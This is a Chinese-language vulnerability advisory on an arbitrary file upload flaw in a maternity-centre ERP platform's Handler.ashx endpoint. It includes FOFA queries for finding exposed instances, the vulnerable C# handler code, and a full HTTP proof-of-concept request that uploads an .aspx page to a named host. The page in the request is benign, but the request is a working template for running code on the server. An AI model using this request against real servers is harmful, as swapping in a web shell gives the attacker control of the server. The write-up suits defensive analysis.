漏洞简介
月子会所ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件。月子会所ERP管理云平台的 Page/ContractManager/ashx/Handler.ashx 接口存在任意文件上传漏洞,由于未对上传文件进行任何过滤,攻击者可利用该漏洞上传恶意文件,进而获取服务器控制权。
fofa语法
body="月子护理ERP管理平台" || body="妈妈宝盒客户端.rar" || body="Page/Login/Login3.aspx" || app="妈妈宝盒-ERP"
漏洞分析
public class Handler : IHttpHandler
{
public void ProcessRequest(HttpContext context)
{
context.Response.ContentType = "text/plain";
HttpFileCollection flist = context.Request.Files;
string UploadfileURLList = "";
if (context.Request.Files.Count > 0)
{
for (int i = 0; i < context.Request.Files.Count; i++)
{
HttpPostedFile mypost = flist[i];
//if (mypost.ContentLength > 0)
//{
string picneme = mypost.FileName;
string tuozhanming = picneme.Substring(picneme.LastIndexOf(".")).ToLower(); //拓展名
string oldName = picneme.Substring(0, picneme.LastIndexOf("."));
//if (tuozhanming == ".xlsx" || tuozhanming == ".docx" || tuozhanming == ".doc" || tuozhanming == ".xls")
//{
string newname = GetNewName(oldName, tuozhanming);
UploadfileURLList += newname + "|";
string url = System.Configuration.ConfigurationManager.AppSettings["UPLOAD_CONTACT_URL"].ToString();
var uploadFileName = HttpContext.Current.Server.MapPath(url);
if (!Directory.Exists(uploadFileName))
{
Directory.CreateDirectory(uploadFileName);
}
//../../UploadBaseFolder/Contact/
mypost.SaveAs(context.Server.MapPath("../" + url + newname));
//mypost.SaveAs(context.Server.MapPath("../../../UploadfileURL/" + newname));
System.Threading.Thread.Sleep(100);
//}
//}
}
UploadfileURLList = UploadfileURLList.Substring(0, UploadfileURLList.Length - 1);
}
context.Response.Write(UploadfileURLList);
}
public string GetNewName(string oldName, string tuozhanming)
{
string time = DateTime.Now.ToString("yyMMddHHmmss");
//string newname = time.Replace("-", "").Replace(" ", "").Replace(":", "").Replace("年", "").Replace("月", "").Replace("日", "").Replace("/", "");
return oldName + "_" + time + new Random().Next(0000000, 9999999) + tuozhanming;
}
UPLOAD_CONTACT_URL 位置在 web.config 设置,一般为
<add key="UPLOAD_CONTACT_URL" value="../../UploadBaseFolder/Contact/" />
所以最终上传文件保存路径为 /UploadBaseFolder/Contact/文件名
漏洞复现
POC
POST /Page/ContractManager/ashx/Handler.ashx HTTP/1.1
Host: mamabaohe.mrxn.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary123
------WebKitFormBoundary123
Content-Disposition: form-data; name="file"; filename="test.aspx"
<%@Page Language="C#"%><%Response.Write(Guid.NewGuid().ToString("N"));System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath));%>
------WebKitFormBoundary123--
访问上传文件 UploadBaseFolder/Contact/响应文件名

成功打印随机GUID字符串并删除自身。


